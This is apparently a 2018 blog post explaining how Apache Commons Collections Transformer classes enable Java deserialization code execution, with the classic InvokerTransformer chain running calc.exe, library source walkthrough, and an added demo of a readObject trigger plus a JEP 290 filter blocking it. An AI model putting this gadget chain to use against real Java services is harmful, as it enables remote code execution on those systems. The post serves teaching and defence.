Java deserialization - how the Transformer classes can execute malicious code
阿新 • Published: 2018-08-16
0x00 Code
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

// Each step receives the previous step's return value as its input.
Transformer[] transformers = new Transformer[] {
    // 1. ignore the input and return Runtime.class
    new ConstantTransformer(Runtime.class),
    // 2. Runtime.class.getMethod("getRuntime", new Class[0])  -> Method getRuntime
    new InvokerTransformer("getMethod",
        new Class[] { String.class, Class[].class },
        new Object[] { "getRuntime", new Class[0] }),
    // 3. getRuntime.invoke(null, new Object[0])  -> the Runtime instance
    new InvokerTransformer("invoke",
        new Class[] { Object.class, Object[].class },
        new Object[] { null, new Object[0] }),
    // 4. runtime.exec("calc.exe")
    new InvokerTransformer("exec",
        new Class[] { String.class },
        new Object[] { "calc.exe" }),
};
Transformer transformerChain = new ChainedTransformer(transformers);

ByteArrayOutputStream out = new ByteArrayOutputStream();
ObjectOutputStream objOut;
try {
    objOut = new ObjectOutputStream(out);
    objOut.writeObject(transformerChain);   // the whole chain is Serializable
    transformerChain.transform(null);       // calling it directly launches calc.exe
} catch (IOException e) {
    e.printStackTrace();
}
Execution result: the chain launches calc.exe.
0x01 Why can the Transformer classes execute malicious code?
transformerChain.transform(null); runs the transform method of ChainedTransformer:
public Object transform(Object object) {
    for (int i = 0; i < iTransformers.length; i++) {
        object = iTransformers[i].transform(object);
    }
    return object;
}
object = iTransformers[i].transform(object); runs, for every element after the first, the transform method of InvokerTransformer:
public Object transform(Object input) {
    if (input == null) {
        return null;
    }
    try {
        Class cls = input.getClass();
        Method method = cls.getMethod(iMethodName, iParamTypes);
        return method.invoke(input, iArgs);
    } catch (NoSuchMethodException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
    } catch (IllegalAccessException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
    } catch (InvocationTargetException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
    }
}
Walking the chain: ConstantTransformer ignores its input (the null passed in) and returns Runtime.class, which is what gives the next step a non-null input to work on (InvokerTransformer returns null immediately when its input is null, so a chain cannot start with it). The first InvokerTransformer reflectively calls getMethod("getRuntime") on that Class object and gets back the Method for Runtime.getRuntime(); the second calls invoke(null) on that Method, which produces the Runtime instance; the third calls exec("calc.exe") on the Runtime. The method name, parameter types and arguments of every step are ordinary serializable fields of the transformer, so whoever controls the serialized bytes controls which methods are called and with what. Note that writing the chain to the ObjectOutputStream in 0x00 does not run it; the explicit transformerChain.transform(null) does. In a real deserialization attack that call is supplied by a serializable class whose readObject (or something it calls) invokes transform() on a transformer that was read from the stream, and that is what turns this chain into a deserialization vulnerability.
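The following is an added example, not code from the original post, that shows the two halves the paragraph above describes: a readObject trigger that runs the chain during deserialization, and a JEP 290 ObjectInputFilter that stops it. The TransformOnRead class is hypothetical (it is not a class from Commons Collections; it only stands in for whatever real gadget calls transform() in readObject), the chain calls String.toUpperCase instead of Runtime.exec so it is safe to run, and the example assumes commons-collections 3.2.1 on the classpath and Java 9 or later for ObjectInputFilter (3.2.2 refuses to deserialize InvokerTransformer unless the system property org.apache.commons.collections.enableUnsafeSerialization is set to true).

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

public class TransformerTriggerDemo {

    /**
     * Hypothetical trigger gadget (assumed for this example, not a Commons Collections class):
     * a Serializable holder whose readObject() calls transform() on a field read from the
     * stream. Any real class of this shape turns a serialized chain into code that runs
     * before the caller of readObject() ever sees the returned object.
     */
    static class TransformOnRead implements Serializable {
        private static final long serialVersionUID = 1L;
        private final Transformer transformer;
        private transient Object result;

        TransformOnRead(Transformer transformer) {
            this.transformer = transformer;
        }

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            // Attacker-supplied transformer, attacker-chosen input: this line is the trigger.
            result = transformer.transform(null);
        }

        Object result() {
            return result;
        }
    }

    /** Same shape as the chain in 0x00, but the last step calls String.toUpperCase, not Runtime.exec. */
    static Transformer harmlessChain() {
        return new ChainedTransformer(new Transformer[] {
            new ConstantTransformer("transform() ran inside readObject"),
            new InvokerTransformer("toUpperCase", new Class[0], new Object[0]),
        });
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    static Object deserialize(byte[] bytes, ObjectInputFilter filter) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            if (filter != null) {
                in.setObjectInputFilter(filter);
            }
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] payload = serialize(new TransformOnRead(harmlessChain()));

        // 1. Unfiltered: the chain runs inside readObject(), i.e. during deserialization itself.
        TransformOnRead holder = (TransformOnRead) deserialize(payload, null);
        System.out.println("unfiltered: " + holder.result());

        // 2. Filtered: reject the functors package and cap the object-graph depth. The stream is
        //    rejected as soon as ChainedTransformer is encountered, before any transform() runs.
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
            "!org.apache.commons.collections.functors.*;maxdepth=10");
        try {
            deserialize(payload, filter);
            System.out.println("filtered: unexpectedly accepted");
        } catch (InvalidClassException e) {
            System.out.println("filtered: rejected (" + e.getMessage() + ")");
        }
    }
}
```

A deny pattern for one package is the narrowest useful fix; in practice an allow-list of the exact classes the application expects to read (with everything else rejected by a trailing "!*") is the setting to deploy, because any other library on the classpath may contain an equivalent chain.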
See also:
the 0x03 supplement at http://blog.51cto.com/13770310/2159962